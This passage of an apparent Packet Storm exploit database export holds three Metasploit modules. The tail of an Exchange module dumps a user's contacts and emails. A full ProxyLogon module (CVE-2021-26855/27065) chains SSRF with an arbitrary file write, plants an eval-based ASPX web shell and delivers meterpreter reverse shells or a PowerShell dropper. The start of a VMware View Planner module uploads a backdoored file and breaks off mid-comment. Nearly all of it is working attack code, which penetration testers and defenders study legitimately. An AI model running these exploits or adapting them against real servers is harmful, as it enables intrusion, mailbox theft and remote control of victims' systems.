\nxml.xpath('//t:ItemId', XMLNS).each do |item| \nprint_status(\" - download item: #{item.values[1]}\") \nresponse = send_xml(soap_download(item.values[0], item.values[1])) \nxml = Nokogiri::XML.parse(response.body) \n \nmessage = xml.at_xpath('//t:MimeContent', XMLNS).content \nwrite_loot(Rex::Text.decode_base64(message)) \nend \nend \n \ndef send_xml(data) \nuri = normalize_uri('ecp', 'temp.js') \n \nreceived = send_request_cgi( \n'method' => 'POST', \n'uri' => uri, \n'cookie' => \"X-BEResource=#{datastore['SERVER_NAME']}/EWS/Exchange.asmx?a=~3;\", \n'ctype' => 'text/xml; charset=utf-8', \n'data' => data \n) \nfail_with(Failure::Unknown, 'Server did not respond in an expected way') unless received \n \nreceived \nend \n \ndef soap_download(id, change_key) \n<<~SOAP \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \nxmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \nxmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \nxmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Body> \n<m:GetItem> \n<m:ItemShape> \n<t:BaseShape>IdOnly</t:BaseShape> \n<t:IncludeMimeContent>true</t:IncludeMimeContent> \n</m:ItemShape> \n<m:ItemIds> \n<t:ItemId Id=\"#{id}\" ChangeKey=\"#{change_key}\" /> \n</m:ItemIds> \n</m:GetItem> \n</soap:Body> \n</soap:Envelope> \nSOAP \nend \n \ndef soap_findcontacts \n<<~SOAP \n<?xml version='1.0' encoding='utf-8'?> \n<soap:Envelope \nxmlns:soap='http://schemas.xmlsoap.org/soap/envelope/' \nxmlns:t='http://schemas.microsoft.com/exchange/services/2006/types' \nxmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages' \nxmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'> \n<soap:Body> \n<m:FindItem Traversal='Shallow'> \n<m:ItemShape> \n<t:BaseShape>AllProperties</t:BaseShape> \n</m:ItemShape> \n<m:IndexedPageItemView MaxEntriesReturned=\"#{datastore['MaxEntries']}\" Offset=\"0\" BasePoint=\"Beginning\" /> 
\n<m:ParentFolderIds> \n<t:DistinguishedFolderId Id='contacts'> \n<t:Mailbox> \n<t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress> \n</t:Mailbox> \n</t:DistinguishedFolderId> \n</m:ParentFolderIds> \n</m:FindItem> \n</soap:Body> \n</soap:Envelope> \nSOAP \nend \n \ndef soap_mailnum \n<<~SOAP \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \nxmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \nxmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \nxmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Body> \n<m:GetFolder> \n<m:FolderShape> \n<t:BaseShape>Default</t:BaseShape> \n</m:FolderShape> \n<m:FolderIds> \n<t:DistinguishedFolderId Id=\"#{datastore['FOLDER']}\"> \n<t:Mailbox> \n<t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress> \n</t:Mailbox> \n</t:DistinguishedFolderId> \n</m:FolderIds> \n</m:GetFolder> \n</soap:Body> \n</soap:Envelope> \nSOAP \nend \n \ndef soap_maillist(max_entries) \n<<~SOAP \n<?xml version='1.0' encoding='utf-8'?> \n<soap:Envelope \nxmlns:soap='http://schemas.xmlsoap.org/soap/envelope/' \nxmlns:t='http://schemas.microsoft.com/exchange/services/2006/types' \nxmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages' \nxmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'> \n<soap:Body> \n<m:FindItem Traversal='Shallow'> \n<m:ItemShape> \n<t:BaseShape>AllProperties</t:BaseShape> \n</m:ItemShape> \n<m:IndexedPageItemView MaxEntriesReturned=\"#{max_entries}\" Offset=\"0\" BasePoint=\"Beginning\" /> \n<m:ParentFolderIds> \n<t:DistinguishedFolderId Id='#{datastore['FOLDER']}'> \n<t:Mailbox> \n<t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress> \n</t:Mailbox> \n</t:DistinguishedFolderId> \n</m:ParentFolderIds> \n</m:FindItem> \n</soap:Body> \n</soap:Envelope> \nSOAP \nend \n \ndef write_loot(data) \nloot_path = store_loot('', 'text/plain', datastore['RHOSTS'], data, '', '') \nprint_good(\" - file saved to 
#{loot_path}\") \nend \n \ndef run \n# get the informations about the targeted user account. \nresponse = send_xml(soap_mailnum) \nif response.body =~ /Success/ \nprint_status('Connection to the server is successful') \nprint_status(\" - selected account: #{datastore['EMAIL']}\\n\") \n \n# grab contacts. \nprint_status('Attempt to dump contacts list for this user') \ngrab_contacts \n \nprint_line \n \n# grab emails. \nprint_status('Attempt to dump emails for this user') \nxml = Nokogiri::XML.parse(response.body) \nfolder_id = xml.at_xpath('//t:FolderId', XMLNS).values \nprint_status(\" - selected folder: #{datastore['FOLDER']} (#{folder_id[0]})\") \n \ntotal_count = xml.at_xpath('//t:TotalCount', XMLNS).content \nprint_status(\" - number of email found: #{total_count}\") \n \nif total_count.to_i > datastore['MaxEntries'] \nprint_warning(\" - number of email recaluled due to max entries: #{datastore['MaxEntries']}\") \ntotal_count = datastore['MaxEntries'].to_s \nend \ngrab_emails(total_count) \nend \nend \n \nend \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162736/msexchange-disclose.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-23T16:45:01", "description": "", "cvss3": {}, "published": "2021-03-23T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange ProxyLogon Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-03-23T00:00:00", "id": "PACKETSTORM:161938", "href": "https://packetstormsecurity.com/files/161938/Microsoft-Exchange-ProxyLogon-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \n \ninclude Msf::Exploit::CmdStager \ninclude 
Msf::Exploit::FileDropper \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::CheckModule \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Exchange ProxyLogon RCE', \n'Description' => %q{ \nThis module exploit a vulnerability on Microsoft Exchange Server that \nallows an attacker bypassing the authentication, impersonating as the \nadmin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get \nthe RCE (Remote Code Execution). \n \nBy taking advantage of this vulnerability, you can execute arbitrary \ncommands on the remote Microsoft Exchange Server. \n \nThis vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, \nExchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, \nExchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). \n \nAll components are vulnerable by default. \n}, \n'Author' => [ \n'Orange Tsai', # Dicovery (Officially acknowledged by MSRC) \n'Jang (@testanull)', # Vulnerability analysis + PoC (https://twitter.com/testanull) \n'mekhalleh (RAMELLA S\u00e9bastien)', # Module author independent researcher (who listen to 'Le Comptoir Secu' and work at Zeop Entreprise) \n'print(\"\")', # https://www.o2oxy.cn/3169.html \n'lotusdll' # https://twitter.com/lotusdll/status/1371465073525362691 \n], \n'References' => [ \n['CVE', '2021-26855'], \n['CVE', '2021-27065'], \n['LOGO', 'https://proxylogon.com/images/logo.jpg'], \n['URL', 'https://proxylogon.com/'], \n['URL', 'http://aka.ms/exchangevulns'], \n['URL', 'https://www.praetorian.com/blog/reproducing-proxylogon-exploit'], \n[ \n'URL', \n'https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265' \n], \n['URL', 'https://www.o2oxy.cn/3169.html'], \n['URL', 'https://github.com/Zeop-CyberSec/proxylogon_writeup'] \n], \n'DisclosureDate' => 
'2021-03-02', \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'CheckModule' => 'auxiliary/scanner/http/exchange_proxylogon', \n'HttpClientTimeout' => 60, \n'RPORT' => 443, \n'SSL' => true, \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n}, \n'Platform' => ['windows'], \n'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Windows Powershell', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :windows_powershell, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Windows Dropper', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :windows_dropper, \n'CmdStagerFlavor' => %i[psh_invokewebrequest], \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest' \n} \n} \n], \n[ \n'Windows Command', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_CMD], \n'Type' => :windows_command, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], \n'AKA' => ['ProxyLogon'] \n} \n) \n) \n \nregister_options([ \nOptString.new('EMAIL', [true, 'A known email address for this organization']), \nOptEnum.new('METHOD', [true, 'HTTP Method to use for the check', 'POST', ['GET', 'POST']]), \nOptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false]) \n]) \n \nregister_advanced_options([ \nOptString.new('ExchangeBasePath', [true, 'The base path where exchange is installed', 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15']), \nOptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\\\auth']), \nOptString.new('IISBasePath', [true, 'The base path where IIS wwwroot directory is', 'C:\\\\inetpub\\\\wwwroot']), \nOptString.new('IISWritePath', [true, 
'The path where you want to write the backdoor', 'aspnet_client']), \nOptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002']), \nOptInt.new('MaxWaitLoop', [true, 'Max counter loop to wait for OAB Virtual Dir reset', 30]), \nOptString.new('UserAgent', [true, 'The HTTP User-Agent sent in the request', 'Mozilla/5.0']) \n]) \nend \n \ndef cmd_windows_generic? \ndatastore['PAYLOAD'] == 'cmd/windows/generic' \nend \n \ndef encode_cmd(cmd) \ncmd.gsub!('\\\\', '\\\\\\\\\\\\') \ncmd.gsub('\"', '\\u0022').gsub('&', '\\u0026').gsub('+', '\\u002b') \nend \n \ndef execute_command(cmd, _opts = {}) \ncmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\").StdOut.ReadAll());\" \nsend_request_raw( \n'method' => 'POST', \n'uri' => normalize_uri(web_directory, @random_filename), \n'ctype' => 'application/x-www-form-urlencoded', \n'data' => \"#{@random_inputname}=#{cmd}\" \n) \nend \n \ndef install_payload(exploit_info) \n# exploit_info: [server_name, sid, session, canary, oab_id] \n \ninput_name = rand_text_alpha(4..8).to_s \nshell = \"http://o/#<script language=\\\"JScript\\\" runat=\\\"server\\\">function Page_Load(){eval(Request[\\\"#{input_name}\\\"],\\\"unsafe\\\");}</script>\" \ndata = { \nidentity: { \n__type: 'Identity:ECP', \nDisplayName: (exploit_info[4][0]).to_s, \nRawIdentity: (exploit_info[4][1]).to_s \n}, \nproperties: { \nParameters: { \n__type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', \nExternalUrl: shell.to_s \n} \n} \n}.to_json \n \nresponse = send_http( \n'POST', \n\"Admin@#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~#{random_ssrf_id}\", \ndata: data, \ncookie: exploit_info[2], \nctype: 'application/json; charset=utf-8', \nheaders: { \n'msExchLogonMailbox' => patch_sid(exploit_info[1]), \n'msExchTargetMailbox' => patch_sid(exploit_info[1]), \n'X-vDirObjectId' => 
(exploit_info[4][1]).to_s \n} \n) \nreturn '' if response.code != 200 \n \ninput_name \nend \n \ndef message(msg) \n\"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\" \nend \n \ndef patch_sid(sid) \nar = sid.to_s.split('-') \nif ar[-1] != '500' \nsid = \"#{ar[0..6].join('-')}-500\" \nend \n \nsid \nend \n \ndef random_mapi_id \nid = \"{#{Rex::Text.rand_text_hex(8)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(12)}}\" \nid.upcase \nend \n \ndef random_ssrf_id \n# https://en.wikipedia.org/wiki/2,147,483,647 (lol) \n# max. 2147483647 \nrand(1941962752..2147483647) \nend \n \ndef request_autodiscover(server_name) \nxmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' } \n \nresponse = send_http( \n'POST', \n\"#{server_name}/autodiscover/autodiscover.xml?a=~#{random_ssrf_id}\", \ndata: soap_autodiscover, \nctype: 'text/xml; charset=utf-8' \n) \n \ncase response.body \nwhen %r{<ErrorCode>500</ErrorCode>} \nfail_with(Failure::NotFound, 'No Autodiscover information was found') \nwhen %r{<Action>redirectAddr</Action>} \nfail_with(Failure::NotFound, 'No email address was found') \nend \n \nxml = Nokogiri::XML.parse(response.body) \n \nlegacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content \nfail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.nil? || legacy_dn.empty? \n \nserver = '' \nxml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item| \ntype = item.at_xpath('./xmlns:Type', xmlns)&.content \nif type == 'EXCH' \nserver = item.at_xpath('./xmlns:Server', xmlns)&.content \nend \nend \nfail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? || server.empty? 
\n \n[server, legacy_dn] \nend \n \n# https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff \ndef request_mapi(server_name, legacy_dn, server_id) \ndata = \"#{legacy_dn}\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\" \nheaders = { \n'X-RequestType' => 'Connect', \n'X-ClientInfo' => random_mapi_id, \n'X-ClientApplication' => datastore['MapiClientApp'], \n'X-RequestId' => \"#{random_mapi_id}:#{Rex::Text.rand_text_numeric(5)}\" \n} \n \nsid = '' \nresponse = send_http( \n'POST', \n\"Admin@#{server_name}:444/mapi/emsmdb?MailboxId=#{server_id}&a=~#{random_ssrf_id}\", \ndata: data, \nctype: 'application/mapi-http', \nheaders: headers \n) \nif response.code == 200 \nsid_regex = /S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/ \n \nsid = response.body.match(sid_regex).to_s \nend \nfail_with(Failure::NotFound, 'No \\'SID\\' was found') if sid.empty? \n \nsid \nend \n \ndef request_oab(server_name, sid, session, canary) \ndata = { \nfilter: { \nParameters: { \n__type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', \nSelectedView: '', \nSelectedVDirType: 'OAB' \n} \n}, \nsort: {} \n}.to_json \n \nresponse = send_http( \n'POST', \n\"Admin@#{server_name}:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary=#{canary}&a=~#{random_ssrf_id}\", \ndata: data, \ncookie: session, \nctype: 'application/json; charset=utf-8', \nheaders: { \n'msExchLogonMailbox' => patch_sid(sid), \n'msExchTargetMailbox' => patch_sid(sid) \n} \n) \n \nif response.code == 200 \ndata = JSON.parse(response.body) \ndata['d']['Output'].each do |oab| \nif oab['Server'].downcase == server_name.downcase \nreturn [oab['Identity']['DisplayName'], oab['Identity']['RawIdentity']] \nend \nend \nend \n \n[] \nend \n \ndef request_proxylogon(server_name, sid) \ndata = \"<r at=\\\"Negotiate\\\" 
ln=\\\"#{datastore['EMAIL'].split('@')[0]}\\\"><s>#{sid}</s></r>\" \nsession_id = '' \ncanary = '' \n \nresponse = send_http( \n'POST', \n\"Admin@#{server_name}:444/ecp/proxyLogon.ecp?a=~#{random_ssrf_id}\", \ndata: data, \nctype: 'text/xml; charset=utf-8', \nheaders: { \n'msExchLogonMailbox' => patch_sid(sid), \n'msExchTargetMailbox' => patch_sid(sid) \n} \n) \nif response.code == 241 \nsession_id = response.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0] \ncanary = response.get_cookies.scan(/msExchEcpCanary=([\\w\\-_.]+);*/).flatten[0] # coin coin coin ... \nend \n \n[session_id, canary] \nend \n \n# pre-authentication SSRF (Server Side Request Forgery) + impersonate as admin. \ndef run_cve_2021_26855 \n# request for internal server name. \nresponse = send_http(datastore['METHOD'], \"localhost~#{random_ssrf_id}\") \nif response.code != 500 || !response.headers.to_s.include?('X-FEServer') \nfail_with(Failure::NotFound, 'No \\'X-FEServer\\' was found') \nend \n \nserver_name = response.headers['X-FEServer'] \nprint_status(\"Internal server name (#{server_name})\") \n \n# get informations by autodiscover request. \nprint_status(message('Sending autodiscover request')) \nserver_id, legacy_dn = request_autodiscover(server_name) \n \nprint_status(\"Server: #{server_id}\") \nprint_status(\"LegacyDN: #{legacy_dn}\") \n \n# get the user UID using mapi request. \nprint_status(message('Sending mapi request')) \nsid = request_mapi(server_name, legacy_dn, server_id) \nprint_status(\"SID: #{sid} (#{datastore['EMAIL']})\") \n \n# search oab \nsid, session, canary, oab_id = search_oab(server_name, sid) \n \n[server_name, sid, session, canary, oab_id] \nend \n \n# post-auth arbitrary file write. \ndef run_cve_2021_27065(session_info) \n# set external url (and set the payload). 
\nprint_status('Prepare the payload on the remote target') \ninput_name = install_payload(session_info) \n \nfail_with(Failure::NoAccess, 'Could\\'t prepare the payload on the remote target') if input_name.empty? \n \n# reset the virtual directory (and write the payload). \nprint_status('Write the payload on the remote target') \nremote_file = write_payload(session_info) \n \nfail_with(Failure::NoAccess, 'Could\\'t write the payload on the remote target') if remote_file.empty? \n \n# wait a lot. \ni = 0 \nwhile i < datastore['MaxWaitLoop'] \nreceived = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(web_directory, remote_file) \n}) \nif received && (received.code == 200) \nbreak \nend \n \nprint_warning(\"Wait a lot (#{i})\") \nsleep 5 \ni += 1 \nend \nfail_with(Failure::PayloadFailed, 'Could\\'t take the remote backdoor (see. ExchangePathBase option)') if received.code == 302 \n \n[input_name, remote_file] \nend \n \ndef search_oab(server_name, sid) \n# request cookies (session and canary) \nprint_status(message('Sending ProxyLogon request')) \n \nprint_status('Try to get a good msExchCanary (by patching user SID method)') \nsession_id, canary = request_proxylogon(server_name, patch_sid(sid)) \nif canary \nsession = \"ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};\" \noab_id = request_oab(server_name, sid, session, canary) \nend \n \nif oab_id.nil? || oab_id.empty? \nprint_status('Try to get a good msExchCanary (without correcting the user SID)') \nsession_id, canary = request_proxylogon(server_name, sid) \nif canary \nsession = \"ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};\" \noab_id = request_oab(server_name, sid, session, canary) \nend \nend \n \nfail_with(Failure::NotFound, 'No \\'ASP.NET_SessionId\\' was found') if session_id.nil? || session_id.empty? \nfail_with(Failure::NotFound, 'No \\'msExchEcpCanary\\' was found') if canary.nil? || canary.empty? 
\nfail_with(Failure::NotFound, 'No \\'OAB Id\\' was found') if oab_id.nil? || oab_id.empty? \n \nprint_status(\"ASP.NET_SessionId: #{session_id}\") \nprint_status(\"msExchEcpCanary: #{canary}\") \nprint_status(\"OAB id: #{oab_id[1]} (#{oab_id[0]})\") \n \nreturn [sid, session, canary, oab_id] \nend \n \ndef send_http(method, ssrf, opts = {}) \nssrf = \"X-BEResource=#{ssrf};\" \nif opts[:cookie] && !opts[:cookie].empty? \nopts[:cookie] = \"#{ssrf} #{opts[:cookie]}\" \nelse \nopts[:cookie] = ssrf.to_s \nend \n \nopts[:ctype] = 'application/x-www-form-urlencoded' if opts[:ctype].nil? \n \nrequest = { \n'method' => method, \n'uri' => @random_uri, \n'agent' => datastore['UserAgent'], \n'ctype' => opts[:ctype] \n} \nrequest = request.merge({ 'data' => opts[:data] }) unless opts[:data].nil? \nrequest = request.merge({ 'cookie' => opts[:cookie] }) unless opts[:cookie].nil? \nrequest = request.merge({ 'headers' => opts[:headers] }) unless opts[:headers].nil? \n \nreceived = send_request_cgi(request) \nfail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received \n \nreceived \nend \n \ndef soap_autodiscover \n<<~SOAP \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\"> \n<Request> \n<EMailAddress>#{datastore['EMAIL']}</EMailAddress> \n<AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> \n</Request> \n</Autodiscover> \nSOAP \nend \n \ndef web_directory \nif datastore['UseAlternatePath'] \nweb_dir = datastore['IISWritePath'].gsub('\\\\', '/') \nelse \nweb_dir = datastore['ExchangeWritePath'].gsub('\\\\', '/') \nend \nweb_dir \nend \n \ndef write_payload(exploit_info) \n# exploit_info: [server_name, sid, session, canary, oab_id] \n \nremote_file = \"#{rand_text_alpha(4..8)}.aspx\" \nif datastore['UseAlternatePath'] \nremote_path = 
\"#{datastore['IISBasePath'].split(':')[1]}\\\\#{datastore['IISWritePath']}\" \nremote_path = \"\\\\\\\\127.0.0.1\\\\#{datastore['IISBasePath'].split(':')[0]}$#{remote_path}\\\\#{remote_file}\" \nelse \nremote_path = \"#{datastore['ExchangeBasePath'].split(':')[1]}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\" \nremote_path = \"\\\\\\\\127.0.0.1\\\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{remote_path}\\\\#{remote_file}\" \nend \n \ndata = { \nidentity: { \n__type: 'Identity:ECP', \nDisplayName: (exploit_info[4][0]).to_s, \nRawIdentity: (exploit_info[4][1]).to_s \n}, \nproperties: { \nParameters: { \n__type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', \nFilePathName: remote_path.to_s \n} \n} \n}.to_json \n \nresponse = send_http( \n'POST', \n\"Admin@#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~#{random_ssrf_id}\", \ndata: data, \ncookie: exploit_info[2], \nctype: 'application/json; charset=utf-8', \nheaders: { \n'msExchLogonMailbox' => patch_sid(exploit_info[1]), \n'msExchTargetMailbox' => patch_sid(exploit_info[1]), \n'X-vDirObjectId' => (exploit_info[4][1]).to_s \n} \n) \nreturn '' if response.code != 200 \n \nremote_file \nend \n \ndef exploit \n@proto = (ssl ? 
'https' : 'http') \n@random_uri = normalize_uri('ecp', \"#{rand_text_alpha(1..3)}.js\") \n \nprint_status(message('Attempt to exploit for CVE-2021-26855')) \nexploit_info = run_cve_2021_26855 \n \nprint_status(message('Attempt to exploit for CVE-2021-27065')) \nshell_info = run_cve_2021_27065(exploit_info) \n \n@random_inputname = shell_info[0] \n@random_filename = shell_info[1] \n \nprint_good(\"Yeeting #{datastore['PAYLOAD']} payload at #{peer}\") \nif datastore['UseAlternatePath'] \nremote_file = \"#{datastore['IISBasePath']}\\\\#{datastore['IISWritePath']}\\\\#{@random_filename}\" \nelse \nremote_file = \"#{datastore['ExchangeBasePath']}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\\\\#{@random_filename}\" \nend \nregister_files_for_cleanup(remote_file) \n \n# trigger powa! \ncase target['Type'] \nwhen :windows_command \nvprint_status(\"Generated payload: #{payload.encoded}\") \n \nif !cmd_windows_generic? \nexecute_command(payload.encoded) \nelse \nresponse = execute_command(\"cmd /c #{payload.encoded}\") \n \nprint_warning('Dumping command output in response') \noutput = response.body.split('Name :')[0] \nif output.empty? 
\nprint_error('Empty response, no command output') \nreturn \nend \nprint_line(output) \nend \nwhen :windows_dropper \nexecute_command(generate_cmdstager(concat_operator: ';').join) \nwhen :windows_powershell \ncmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true) \nexecute_command(cmd) \nend \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161938/exchange_proxylogon_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-19T17:09:26", "description": "", "cvss3": {}, "published": "2021-03-19T00:00:00", "type": "packetstorm", "title": "VMware View Planner 4.6 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21978"], "modified": "2021-03-19T00:00:00", "id": "PACKETSTORM:161879", "href": "https://packetstormsecurity.com/files/161879/VMware-View-Planner-4.6-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware View Planner Unauthenticated Log File Upload RCE', \n'Description' => %q{ \nThis module exploits an unauthenticated log file upload within the \nlog_upload_wsgi.py file of VMWare View Planner 4.6 prior to 4.6 \nSecurity Patch 1. \n \nSuccessful exploitation will result in RCE as the apache user inside \nthe appacheServer Docker container. 
\n}, \n'Author' => [ \n'Mikhail Klyuchnikov', # Discovery \n'wvu', # Analysis and PoC \n'Grant Willcox' # Metasploit Module \n], \n'References' => [ \n['CVE', '2021-21978'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0003.html'], \n['URL', 'https://attackerkb.com/assessments/fc456e03-adf5-409a-955a-8a4fb7e79ece'] # wvu's PoC \n], \n'DisclosureDate' => '2021-03-02', # Vendor advisory \n'License' => MSF_LICENSE, \n'Privileged' => false, \n'Platform' => 'python', \n'Targets' => [ \n[ \n'VMware View Planner 4.6.0', \n{ \n'Arch' => ARCH_PYTHON, \n'Type' => :linux_command, \n'DefaultOptions' => { \n'PAYLOAD' => 'python/meterpreter/reverse_tcp' \n} \n} \n], \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'wsgi_log_upload', 'log_upload_wsgi.py') \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \nunless res.code == 200 && !res.body.empty? \nreturn CheckCode::Safe('log_upload_wsgi.py file not found at the expected location.') \nend \n \n@original_content = res.body # If the server responded with the contents of log_upload_wsgi.py, lets save this for later restoration. \n \nif res.body&.include?('import hashlib') && res.body&.include?('if hashlib.sha256(password.value.encode(\"utf8\")).hexdigest()==secret_key:') \nreturn CheckCode::Safe(\"Target's log_upload_wsgi.py file has been patched.\") \nend \n \nCheckCode::Appears('Vulnerable log_upload_wsgi.py file identified!') \nend \n \n# We need to upload a file twice: once for uploading the backdoor, and once for restoring the original file. 
\n# As the code for both is the same, minus the content of the file, this is a generic function to handle that. \ndef upload_file(content) \nmime = Rex::MIME::Message.new \nmime.add_part(content, 'application/octet-stream', nil, \"form-data; name=\\\"logfile\\\"; filename=\\\"#{Rex::Text.rand_text_alpha(20)}\\\"\") \nmime.add_part('{\"itrLogPath\":\"/etc/httpd/html/wsgi_log_upload\",\"logFileType\":\"log_upload_wsgi.py\"}', nil, nil, 'form-data; name=\"logMetaData\"') \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'logupload'), \n'ctype' => \"multipart/form-data; boundary=#{mime.bound}\", \n'data' => mime.to_s \n) \nunless res.to_s.include?('File uploaded successfully.') \nfail_with(Failure::UnexpectedReply, \"Target indicated that the file wasn't uploaded successfully!\") \nend \nend \n \ndef exploit \n# Here we want to grab our template file, taken from a clean install but \n# with a backdoor section added to it, and then fill in the PAYLOAD placeholder 